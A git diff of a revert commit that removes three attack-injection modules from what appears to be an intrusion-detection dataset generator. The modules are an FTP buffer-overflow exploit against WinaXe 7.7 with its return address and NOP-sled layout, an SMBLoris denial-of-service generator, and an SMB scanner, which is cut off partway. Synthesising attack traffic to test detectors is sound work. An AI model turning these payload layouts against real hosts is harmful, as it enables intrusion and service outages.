Ver código fonte

Revert "rest of other group's files"

This reverts commit 3006d2e3b819618d2f27de3df307d6d7ee5b4107.
Denis Waßmann 6 anos atrás
pai
commit
929f355959

+ 0 - 259
code/Attack/FTPWinaXeExploit.py

@@ -1,259 +0,0 @@
-import logging
-
-from random import randint
-from lea import Lea
-from scapy.layers.inet import IP, Ether, TCP
-
-from Attack import BaseAttack
-from Attack.AttackParameters import Parameter as Param
-from Attack.AttackParameters import ParameterTypes
-from ID2TLib.Utility import update_timestamp, generate_source_port_from_platform, get_rnd_x86_nop, forbidden_chars,\
-    get_rnd_bytes, get_bytes_from_file
-
-logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
-# noinspection PyPep8
-
-ftp_port = 21
-
-
-class FTPWinaXeExploit(BaseAttack.BaseAttack):
-
-    def __init__(self):
-        """
-        Creates a new instance of the FTPWinaXeExploit.
-
-        """
-        # Initialize attack
-        super(FTPWinaXeExploit, self).__init__("FTPWinaXe Exploit", "Injects an WinaXe 7.7 FTP Exploit.",
-                                               "Privilege elevation")
-
-        # Define allowed parameters and their type
-        self.supported_params = {
-            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
-            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
-            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
-            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
-            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
-            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
-            Param.IP_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
-            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
-            Param.CUSTOM_PAYLOAD: ParameterTypes.TYPE_STRING,
-            Param.CUSTOM_PAYLOAD_FILE: ParameterTypes.TYPE_STRING
-        }
-
-    def init_params(self):
-        """
-        Initialize the parameters of this attack using the user supplied command line parameters.
-        Use the provided statistics to calculate default parameters and to process user
-        supplied queries.
-
-        """
-        # PARAMETERS: initialize with default values
-        # (values are overwritten if user specifies them)
-        most_used_ip_address = self.statistics.get_most_used_ip_address()
-        if isinstance(most_used_ip_address, list):
-            most_used_ip_address = most_used_ip_address[0]
-
-        # The most used IP class in background traffic
-        most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
-        attacker_ip = self.generate_random_ipv4_address(most_used_ip_class)
-        self.add_param_value(Param.IP_DESTINATION, attacker_ip)
-        self.add_param_value(Param.MAC_DESTINATION, self.generate_random_mac_address())
-
-        random_ip_address = self.statistics.get_random_ip_address()
-        # victim should be valid and not equal to attacker
-        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == attacker_ip:
-            random_ip_address = self.statistics.get_random_ip_address()
-
-        self.add_param_value(Param.IP_SOURCE, random_ip_address)
-        victim_mac = self.statistics.get_mac_address(random_ip_address)
-        if isinstance(victim_mac, list) and len(victim_mac) == 0:
-            victim_mac = self.generate_random_mac_address()
-        self.add_param_value(Param.MAC_SOURCE, victim_mac)
-        self.add_param_value(Param.PACKETS_PER_SECOND,
-                             (self.statistics.get_pps_sent(most_used_ip_address) +
-                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
-        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
-        self.add_param_value(Param.IP_SOURCE_RANDOMIZE, 'False')
-        self.add_param_value(Param.CUSTOM_PAYLOAD, '')
-        self.add_param_value(Param.CUSTOM_PAYLOAD_FILE, '')
-
-    def generate_attack_pcap(self):
-        def get_ip_data(ip_address: str):
-            """
-            :param ip_address: The ip of which (packet-)data shall be returned
-            :return: MSS, TTL and window size values of the given IP
-            """
-            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
-            mss_dist = self.statistics.get_mss_distribution(ip_address)
-            if len(mss_dist) > 0:
-                mss_prob_dict = Lea.fromValFreqsDict(mss_dist)
-                mss_value = mss_prob_dict.random()
-            else:
-                mss_value = self.statistics.process_db_query("most_used(mssValue)")
-
-            # Set TTL based on TTL distribution of IP address
-            ttl_dist = self.statistics.get_ttl_distribution(ip_address)
-            if len(ttl_dist) > 0:
-                ttl_prob_dict = Lea.fromValFreqsDict(ttl_dist)
-                ttl_value = ttl_prob_dict.random()
-            else:
-                ttl_value = self.statistics.process_db_query("most_used(ttlValue)")
-
-            # Set Window Size based on Window Size distribution of IP address
-            win_dist = self.statistics.get_win_distribution(ip_address)
-            if len(win_dist) > 0:
-                win_prob_dict = Lea.fromValFreqsDict(win_dist)
-                win_value = win_prob_dict.random()
-            else:
-                win_value = self.statistics.process_db_query("most_used(winSize)")
-
-            return mss_value, ttl_value, win_value
-
-        def check_payload_len(payload_len: int, limit: int):
-            """
-            Checks if the len of the payload exceeds a given limit
-            :param payload_len: The length of the payload
-            :param limit: The limit of the length of the payload which is allowed
-            """
-
-            if payload_len > limit:
-                print("\nCustom payload too long: ", payload_len, " bytes. Should be a maximum of ", limit, " bytes.")
-                exit(1)
-
-
-        pps = self.get_param_value(Param.PACKETS_PER_SECOND)
-
-        # Timestamp
-        timestamp_next_pkt = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
-        # store start time of attack
-        self.attack_start_utime = timestamp_next_pkt
-
-        # Initialize parameters
-        ip_victim = self.get_param_value(Param.IP_SOURCE)
-        ip_attacker = self.get_param_value(Param.IP_DESTINATION)
-        mac_victim = self.get_param_value(Param.MAC_SOURCE)
-        mac_attacker = self.get_param_value(Param.MAC_DESTINATION)
-
-        custom_payload = self.get_param_value(Param.CUSTOM_PAYLOAD)
-        custom_payload_len = len(custom_payload)
-        custom_payload_limit = 1000
-        check_payload_len(custom_payload_len, custom_payload_limit)
-
-        packets = []
-
-        # Create random victim if specified
-        if self.get_param_value(Param.IP_SOURCE_RANDOMIZE):
-            # The most used IP class in background traffic
-            most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
-            ip_victim = self.generate_random_ipv4_address(most_used_ip_class, 1)
-            mac_victim = self.generate_random_mac_address()
-
-        # Get MSS, TTL and Window size value for victim/attacker IP
-        victim_mss_value, victim_ttl_value, victim_win_value = get_ip_data(ip_victim)
-        attacker_mss_value, attacker_ttl_value, attacker_win_value = get_ip_data(ip_attacker)
-
-        minDelay, maxDelay = self.get_reply_delay(ip_attacker)
-
-        attacker_seq = randint(1000, 50000)
-        victim_seq = randint(1000, 50000)
-
-        sport = generate_source_port_from_platform("win7")
-
-        # connection request from victim (client)
-        victim_ether = Ether(src=mac_victim, dst=mac_attacker)
-        victim_ip = IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF')
-        request_tcp = TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S',
-                          seq=victim_seq, options=[('MSS', victim_mss_value)])
-        victim_seq += 1
-        syn = (victim_ether / victim_ip / request_tcp)
-        syn.time = timestamp_next_pkt
-        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
-        packets.append(syn)
-
-        # response from attacker (server)
-        attacker_ether = Ether(src=mac_attacker, dst=mac_victim)
-        attacker_ip = IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF')
-        reply_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA',
-                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
-        attacker_seq += 1
-        synack = (attacker_ether / attacker_ip / reply_tcp)
-        synack.time = timestamp_next_pkt
-        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
-        packets.append(synack)
-
-        # acknowledgement from victim (client)
-        ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
-                      window=victim_win_value, options=[('MSS', victim_mss_value)])
-        ack = (victim_ether / victim_ip / ack_tcp)
-        ack.time = timestamp_next_pkt
-        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
-        packets.append(ack)
-
-        # FTP exploit packet
-        ftp_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA',
-                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
-
-        characters = b'220'
-        characters += get_rnd_bytes(2065, forbidden_chars)
-        characters += b'\x96\x72\x01\x68'
-        characters += get_rnd_x86_nop(10, False, forbidden_chars)
-
-        custom_payload_file = self.get_param_value(Param.CUSTOM_PAYLOAD_FILE)
-
-        if custom_payload == '':
-            if custom_payload_file == '':
-                payload = get_rnd_bytes(custom_payload_limit, forbidden_chars)
-            else:
-                payload = get_bytes_from_file(custom_payload_file)
-                check_payload_len(len(payload), custom_payload_limit)
-                payload += get_rnd_x86_nop(custom_payload_limit - len(payload), False, forbidden_chars)
-        else:
-            encoded_payload = custom_payload.encode()
-            payload = get_rnd_x86_nop(custom_payload_limit - custom_payload_len, False, forbidden_chars)
-            payload += encoded_payload
-
-        characters += payload
-        characters += get_rnd_x86_nop(20, False, forbidden_chars)
-        characters += b'\r\n'
-
-        ftp_tcp.add_payload(characters)
-
-        ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
-        ftp_buff.time = timestamp_next_pkt
-        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
-        packets.append(ftp_buff)
-        attacker_seq += len(ftp_tcp.payload)
-
-        # Fin Ack from attacker
-        fin_ack_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA',
-                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
-
-        fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
-        fin_ack.time = timestamp_next_pkt
-        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
-        packets.append(fin_ack)
-
-        # Ack from victim on FTP packet
-        ftp_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
-                      window=victim_win_value, options=[('MSS', victim_mss_value)])
-        ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
-        ftp_ack.time = timestamp_next_pkt
-        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
-        packets.append(ftp_ack)
-
-        # Ack from victim on Fin/Ack of attacker
-        fin_ack_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq+1, flags='A',
-                      window=victim_win_value, options=[('MSS', victim_mss_value)])
-        fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
-        fin_ack_ack.time = timestamp_next_pkt
-        packets.append(fin_ack_ack)
-
-        # store end time of attack
-        self.attack_end_utime = packets[-1].time
-
-        # write attack packets to pcap
-        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))
-
-        # return packets sorted by packet time_sec_start
-        return len(packets), pcap_path

+ 0 - 244
code/Attack/SMBLorisAttack.py

@@ -1,244 +0,0 @@
-import logging
-
-from random import randint, uniform
-from lea import Lea
-from scapy.layers.inet import IP, Ether, TCP
-from scapy.layers.netbios import NBTSession
-
-from Attack import BaseAttack
-from Attack.AttackParameters import Parameter as Param
-from Attack.AttackParameters import ParameterTypes
-from ID2TLib.Utility import update_timestamp
-from ID2TLib.SMBLib import smb_port
-
-logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
-# noinspection PyPep8
-
-
-class SMBLorisAttack(BaseAttack.BaseAttack):
-
-    def __init__(self):
-        """
-        Creates a new instance of the SMBLorisAttack.
-
-        """
-        # Initialize attack
-        super(SMBLorisAttack, self).__init__("SMBLoris Attack", "Injects an SMBLoris (D)DoS Attack",
-                                             "Resource Exhaustion")
-
-        # Define allowed parameters and their type
-        self.supported_params = {
-            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
-            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
-            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
-            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
-            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
-            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
-            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
-            Param.ATTACK_DURATION: ParameterTypes.TYPE_INTEGER_POSITIVE,
-            Param.NUMBER_ATTACKERS: ParameterTypes.TYPE_INTEGER_POSITIVE
-        }
-
-    def init_params(self):
-        """
-        Initialize the parameters of this attack using the user supplied command line parameters.
-        Use the provided statistics to calculate default parameters and to process user
-        supplied queries.
-
-        :param statistics: Reference to a statistics object.
-        """
-        # PARAMETERS: initialize with default values
-        # (values are overwritten if user specifies them)
-        most_used_ip_address = self.statistics.get_most_used_ip_address()
-        if isinstance(most_used_ip_address, list):
-            most_used_ip_address = most_used_ip_address[0]
-
-        # The most used IP class in background traffic
-        most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
-        num_attackers = randint(1, 16)
-        source_ip = self.generate_random_ipv4_address(most_used_ip_class, num_attackers)
-
-        self.add_param_value(Param.IP_SOURCE, source_ip)
-        self.add_param_value(Param.MAC_SOURCE, self.generate_random_mac_address(num_attackers))
-
-        random_ip_address = self.statistics.get_random_ip_address()
-        # ip-dst should be valid and not equal to ip.src
-        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == source_ip:
-            random_ip_address = self.statistics.get_random_ip_address()
-
-        self.add_param_value(Param.IP_DESTINATION, random_ip_address)
-        destination_mac = self.statistics.get_mac_address(random_ip_address)
-        if isinstance(destination_mac, list) and len(destination_mac) == 0:
-            destination_mac = self.generate_random_mac_address()
-        self.add_param_value(Param.MAC_DESTINATION, destination_mac)
-        self.add_param_value(Param.PACKETS_PER_SECOND,
-                             (self.statistics.get_pps_sent(most_used_ip_address) +
-                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
-        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
-        self.add_param_value(Param.ATTACK_DURATION, 30)
-
-    def generate_attack_pcap(self):
-        def get_ip_data(ip_address: str):
-            """
-            :param ip_address: the ip of which (packet-)data shall be returned
-            :return: MSS, TTL and Window Size values of the given IP
-            """
-            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
-            mss_dist = self.statistics.get_mss_distribution(ip_address)
-            if len(mss_dist) > 0:
-                mss_prob_dict = Lea.fromValFreqsDict(mss_dist)
-                mss_value = mss_prob_dict.random()
-            else:
-                mss_value = self.statistics.process_db_query("most_used(mssValue)")
-
-            # Set TTL based on TTL distribution of IP address
-            ttl_dist = self.statistics.get_ttl_distribution(ip_address)
-            if len(ttl_dist) > 0:
-                ttl_prob_dict = Lea.fromValFreqsDict(ttl_dist)
-                ttl_value = ttl_prob_dict.random()
-            else:
-                ttl_value = self.statistics.process_db_query("most_used(ttlValue)")
-
-            # Set Window Size based on Window Size distribution of IP address
-            win_dist = self.statistics.get_win_distribution(ip_address)
-            if len(win_dist) > 0:
-                win_prob_dict = Lea.fromValFreqsDict(win_dist)
-                win_value = win_prob_dict.random()
-            else:
-                win_value = self.statistics.process_db_query("most_used(winSize)")
-
-            return mss_value, ttl_value, win_value
-
-        pps = self.get_param_value(Param.PACKETS_PER_SECOND)
-
-        # Timestamp
-        first_timestamp = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
-        # store start time of attack
-        self.attack_start_utime = first_timestamp
-
-        # Initialize parameters
-        packets = []
-        ip_destination = self.get_param_value(Param.IP_DESTINATION)
-        mac_destination = self.get_param_value(Param.MAC_DESTINATION)
-
-        # Determine source IP and MAC address
-        num_attackers = self.get_param_value(Param.NUMBER_ATTACKERS)
-        if (num_attackers is not None) and (num_attackers is not 0):  # user supplied Param.NUMBER_ATTACKERS
-            # The most used IP class in background traffic
-            most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
-            # Create random attackers based on user input Param.NUMBER_ATTACKERS
-            ip_source = self.generate_random_ipv4_address(most_used_ip_class, num_attackers)
-            mac_source = self.generate_random_mac_address(num_attackers)
-        else:  # user did not supply Param.NUMBER_ATTACKS
-            # use default values for IP_SOURCE/MAC_SOURCE or overwritten values
-            # if user supplied any values for those params
-            ip_source = self.get_param_value(Param.IP_SOURCE)
-            mac_source = self.get_param_value(Param.MAC_SOURCE)
-
-        ip_source_list = []
-        mac_source_list = []
-
-        if isinstance(ip_source, list):
-            ip_source_list = ip_source
-        else:
-            ip_source_list.append(ip_source)
-
-        if isinstance(mac_source, list):
-            mac_source_list = mac_source
-        else:
-            mac_source_list.append(mac_source)
-
-        if (num_attackers is None) or (num_attackers is 0):
-            num_attackers = min(len(ip_source_list), len(mac_source_list))
-
-        # Check ip.src == ip.dst
-        self.ip_src_dst_equal_check(ip_source_list, ip_destination)
-
-        # Get MSS, TTL and Window size value for destination IP
-        destination_mss_value, destination_ttl_value, destination_win_value = get_ip_data(ip_destination)
-
-        minDelay,maxDelay = self.get_reply_delay(ip_destination)
-
-        attack_duration = self.get_param_value(Param.ATTACK_DURATION)
-        attack_ends_time = first_timestamp + attack_duration
-
-        victim_pps = pps*num_attackers
-
-        for attacker in range(num_attackers):
-            # Get MSS, TTL and Window size value for source IP(attacker)
-            source_mss_value, source_ttl_value, source_win_value = get_ip_data(ip_source_list[attacker])
-
-            attacker_seq = randint(1000, 50000)
-            victim_seq = randint(1000, 50000)
-
-            sport = 1025
-
-            # Timestamps of first packets shouldn't be exactly the same to look more realistic
-            timestamp_next_pkt = uniform(first_timestamp, update_timestamp(first_timestamp, pps))
-
-            while timestamp_next_pkt <= attack_ends_time:
-                # Establish TCP connection
-                if sport > 65535:
-                    sport = 1025
-
-                # prepare reusable Ethernet- and IP-headers
-                attacker_ether = Ether(src=mac_source_list[attacker], dst=mac_destination)
-                attacker_ip = IP(src=ip_source_list[attacker], dst=ip_destination, ttl=source_ttl_value, flags='DF')
-                victim_ether = Ether(src=mac_destination, dst=mac_source_list[attacker])
-                victim_ip = IP(src=ip_destination, dst=ip_source_list[attacker], ttl=destination_ttl_value, flags='DF')
-
-                # connection request from attacker (client)
-                syn_tcp = TCP(sport=sport, dport=smb_port, window=source_win_value, flags='S',
-                              seq=attacker_seq, options=[('MSS', source_mss_value)])
-                attacker_seq += 1
-                syn = (attacker_ether / attacker_ip / syn_tcp)
-                syn.time = timestamp_next_pkt
-                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, victim_pps, minDelay)
-                packets.append(syn)
-
-                # response from victim (server)
-                synack_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq, flags='SA',
-                                 window=destination_win_value, options=[('MSS', destination_mss_value)])
-                victim_seq += 1
-                synack = (victim_ether / victim_ip / synack_tcp)
-                synack.time = timestamp_next_pkt
-                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
-                packets.append(synack)
-
-                # acknowledgement from attacker (client)
-                ack_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq, flags='A',
-                              window=source_win_value, options=[('MSS', source_mss_value)])
-                ack = (attacker_ether / attacker_ip / ack_tcp)
-                ack.time = timestamp_next_pkt
-                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
-                packets.append(ack)
-
-                # send NBT session header paket with maximum LENGTH-field
-                req_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq, flags='AP',
-                              window=source_win_value, options=[('MSS', source_mss_value)])
-                req_payload = NBTSession(TYPE=0x00, LENGTH=0x1FFFF)
-
-                attacker_seq += len(req_payload)
-                req = (attacker_ether / attacker_ip / req_tcp / req_payload)
-                req.time = timestamp_next_pkt
-                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, victim_pps, minDelay)
-                packets.append(req)
-
-                # final ack from victim (server)
-                last_ack_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq, flags='A',
-                                   window=destination_win_value, options=[('MSS', destination_mss_value)])
-                last_ack = (victim_ether / victim_ip / last_ack_tcp)
-                last_ack.time = timestamp_next_pkt
-                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
-                packets.append(last_ack)
-
-                sport += 1
-
-        # store end time of attack
-        self.attack_end_utime = packets[-1].time
-
-        # write attack packets to pcap
-        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))
-
-        # return packets sorted by packet time_sec_start
-        return len(packets), pcap_path

+ 0 - 410
code/Attack/SMBScanAttack.py

@@ -1,410 +0,0 @@
-import logging
-
-from random import shuffle, randint
-from lea import Lea
-from scapy.layers.inet import IP, Ether, TCP
-from scapy.layers.smb import *
-from scapy.layers.netbios import *
-
-from Attack import BaseAttack
-from Attack.AttackParameters import Parameter as Param
-from Attack.AttackParameters import ParameterTypes
-from ID2TLib.SMB2 import *
-from ID2TLib.Utility import update_timestamp, get_interval_pps, get_rnd_os, get_ip_range,\
-    generate_source_port_from_platform, get_filetime_format
-from ID2TLib.SMBLib import smb_port, smb_versions, smb_dialects, get_smb_version, get_smb_platform_data,\
-    invalid_smb_version
-
-logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
-# noinspection PyPep8
-
-
-class SMBScanAttack(BaseAttack.BaseAttack):
-
-    def __init__(self):
-        """
-        Creates a new instance of the SMBScanAttack.
-
-        """
-        # Initialize attack
-        super(SMBScanAttack, self).__init__("SmbScan Attack", "Injects an SMB scan",
-                                             "Scanning/Probing")
-
-        # Define allowed parameters and their type
-        self.supported_params = {
-            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
-            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
-            Param.PORT_SOURCE: ParameterTypes.TYPE_PORT,
-            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
-            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
-            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
-            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
-            Param.IP_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
-            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
-            Param.PORT_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
-            Param.HOSTING_IP: ParameterTypes.TYPE_IP_ADDRESS,
-            Param.HOSTING_VERSION: ParameterTypes.TYPE_STRING,
-            Param.SOURCE_PLATFORM: ParameterTypes.TYPE_STRING,
-            Param.PROTOCOL_VERSION: ParameterTypes.TYPE_STRING,
-            Param.IP_DESTINATION_END: ParameterTypes.TYPE_IP_ADDRESS
-        }
-
-    def init_params(self):
-        """
-        Initialize the parameters of this attack using the user supplied command line parameters.
-        Use the provided statistics to calculate default parameters and to process user
-        supplied queries.
-
-        :param statistics: Reference to a statistics object.
-        """
-        # PARAMETERS: initialize with default values
-        # (values are overwritten if user specifies them)
-        most_used_ip_address = self.statistics.get_most_used_ip_address()
-        if isinstance(most_used_ip_address, list):
-            most_used_ip_address = most_used_ip_address[0]
-
-        self.add_param_value(Param.IP_SOURCE, most_used_ip_address)
-        self.add_param_value(Param.IP_SOURCE_RANDOMIZE, 'False')
-        self.add_param_value(Param.MAC_SOURCE, self.statistics.get_mac_address(most_used_ip_address))
-
-        all_ips = self.statistics.get_ip_addresses()
-        if not isinstance(all_ips, list):
-            ip_destinations = []
-            ip_destinations.append(all_ips)
-        else:
-            ip_destinations = all_ips
-        self.add_param_value(Param.IP_DESTINATION, ip_destinations)
-        destination_mac = []
-        for ip in ip_destinations:
-            destination_mac.append(self.statistics.get_mac_address(str(ip)))
-        if isinstance(destination_mac, list) and len(destination_mac) == 0:
-            destination_mac = self.generate_random_mac_address()
-        self.add_param_value(Param.MAC_DESTINATION, destination_mac)
-        self.add_param_value(Param.PORT_SOURCE, randint(1024, 65535))
-        self.add_param_value(Param.PORT_SOURCE_RANDOMIZE, 'True')
-        self.add_param_value(Param.PACKETS_PER_SECOND,
-                             (self.statistics.get_pps_sent(most_used_ip_address) +
-                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
-        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
-
-        rnd_ip_count = self.statistics.get_ip_address_count()/2
-        self.add_param_value(Param.HOSTING_IP, self.statistics.get_random_ip_address(rnd_ip_count))
-        self.host_os = get_rnd_os()
-        self.add_param_value(Param.HOSTING_VERSION, get_smb_version(platform=self.host_os))
-        self.add_param_value(Param.SOURCE_PLATFORM, get_rnd_os())
-        self.add_param_value(Param.PROTOCOL_VERSION, "1")
-        self.add_param_value(Param.IP_DESTINATION_END, "0.0.0.0")
-
-    def generate_attack_pcap(self):
-        def get_ip_data(ip_address: str):
-            """
-            Gets the MSS, TTL and Windows Size values of a given IP
-
-            :param ip_address: the ip of which (packet-)data shall be returned
-            :return: MSS, TTL and Window Size values of the given IP
-            """
-            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
-            mss_dist = self.statistics.get_mss_distribution(ip_address)
-            if len(mss_dist) > 0:
-                mss_prob_dict = Lea.fromValFreqsDict(mss_dist)
-                mss_value = mss_prob_dict.random()
-            else:
-                mss_value = self.statistics.process_db_query("most_used(mssValue)")
-
-            # Set TTL based on TTL distribution of IP address
-            ttl_dist = self.statistics.get_ttl_distribution(ip_address)
-            if len(ttl_dist) > 0:
-                ttl_prob_dict = Lea.fromValFreqsDict(ttl_dist)
-                ttl_value = ttl_prob_dict.random()
-            else:
-                ttl_value = self.statistics.process_db_query("most_used(ttlValue)")
-
-            # Set Window Size based on Window Size distribution of IP address
-            win_dist = self.statistics.get_win_distribution(ip_address)
-            if len(win_dist) > 0:
-                win_prob_dict = Lea.fromValFreqsDict(win_dist)
-                win_value = win_prob_dict.random()
-            else:
-                win_value = self.statistics.process_db_query("most_used(winSize)")
-
-            return mss_value, ttl_value, win_value
-
-        pps = self.get_param_value(Param.PACKETS_PER_SECOND)
-
-        # Calculate complement packet rates of the background traffic for each interval
-        complement_interval_pps = self.statistics.calculate_complement_packet_rates(pps)
-
-
-        # Timestamp
-        timestamp_next_pkt = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
-        # store start time of attack
-        self.attack_start_utime = timestamp_next_pkt
-        timestamp_prv_reply, timestamp_confirm = 0,0
-
-        # Initialize parameters
-        ip_source = self.get_param_value(Param.IP_SOURCE)
-        ip_destinations = self.get_param_value(Param.IP_DESTINATION)
-        hosting_ip = self.get_param_value(Param.HOSTING_IP)
-        ip_range_end = self.get_param_value(Param.IP_DESTINATION_END)
-        mac_source = self.get_param_value(Param.MAC_SOURCE)
-        mac_dest = self.get_param_value(Param.MAC_DESTINATION)
-
-        # Check smb version
-        smb_version = self.get_param_value(Param.PROTOCOL_VERSION)
-        if smb_version not in smb_versions:
-            invalid_smb_version(smb_version)
-        hosting_version = self.get_param_value(Param.HOSTING_VERSION)
-        if hosting_version not in smb_versions:
-            invalid_smb_version(hosting_version)
-        # Check source platform
-        src_platform = self.get_param_value(Param.SOURCE_PLATFORM).lower()
-        packets = []
-
-        # randomize source ports according to platform, if specified
-        if self.get_param_value(Param.PORT_SOURCE_RANDOMIZE):
-            sport = generate_source_port_from_platform(src_platform)
-        else:
-            sport = self.get_param_value(Param.PORT_SOURCE)
-
-        # No destination IP was specified, but a destination MAC was specified, generate IP that fits MAC
-        if isinstance(ip_destinations, list) and isinstance(mac_dest, str):
-            ip_destinations = self.statistics.get_ip_address_from_mac(mac_dest)
-            if len(ip_destinations) == 0:
-                ip_destinations = self.generate_random_ipv4_address("Unknown", 1)
-            # Check ip.src == ip.dst
-            self.ip_src_dst_equal_check(ip_source, ip_destinations)
-
-        ip_dests = []
-        if isinstance(ip_destinations, list):
-            ip_dests = ip_destinations
-        else:
-            ip_dests.append(ip_destinations)
-
-        # Generate IPs of destination IP range, if specified
-        if ip_range_end != "0.0.0.0":
-            ip_dests = get_ip_range(ip_dests[0], ip_range_end)
-            shuffle(ip_dests)
-
-        # Randomize source IP, if specified
-        if self.get_param_value(Param.IP_SOURCE_RANDOMIZE):
-            ip_source = self.generate_random_ipv4_address("Unknown", 1)
-            while ip_source in ip_dests:
-                ip_source = self.generate_random_ipv4_address("Unknown", 1)
-            mac_source = self.statistics.get_mac_address(str(ip_source))
-            if len(mac_source) == 0:
-                mac_source = self.generate_random_mac_address()
-
-        # Get MSS, TTL and Window size value for source IP
-        source_mss_value, source_ttl_value, source_win_value = get_ip_data(ip_source)
-
-        for ip in ip_dests:
-
-            if ip != ip_source:
-
-                # Get destination Mac Address
-                mac_destination = self.statistics.get_mac_address(str(ip))
-                if len(mac_destination) == 0:
-                    if isinstance(mac_dest, str):
-                        if len(self.statistics.get_ip_address_from_mac(mac_dest)) != 0:
-                            ip = self.statistics.get_ip_address_from_mac(mac_dest)
-                            self.ip_src_dst_equal_check(ip_source, ip)
-
-                        mac_destination = mac_dest
-
-                    else:
-                        mac_destination = self.generate_random_mac_address()
-
-                # Get MSS, TTL and Window size value for destination IP
-                destination_mss_value, destination_ttl_value, destination_win_value = get_ip_data(ip)
-
-                minDelay, maxDelay = self.get_reply_delay(ip)
-
-                # New connection, new random TCP sequence numbers
-                attacker_seq = randint(1000, 50000)
-                victim_seq = randint(1000, 50000)
-
-                # Randomize source port for each connection if specified
-                if self.get_param_value(Param.PORT_SOURCE_RANDOMIZE):
-                    sport = generate_source_port_from_platform(src_platform, sport)
-
-                # 1) Build request package
-                request_ether = Ether(src=mac_source, dst=mac_destination)
-                request_ip = IP(src=ip_source, dst=ip, ttl=source_ttl_value, flags='DF')
-                request_tcp = TCP(sport=sport, dport=smb_port, window=source_win_value, flags='S',
-                                  seq=attacker_seq, options=[('MSS', source_mss_value)])
-                attacker_seq += 1
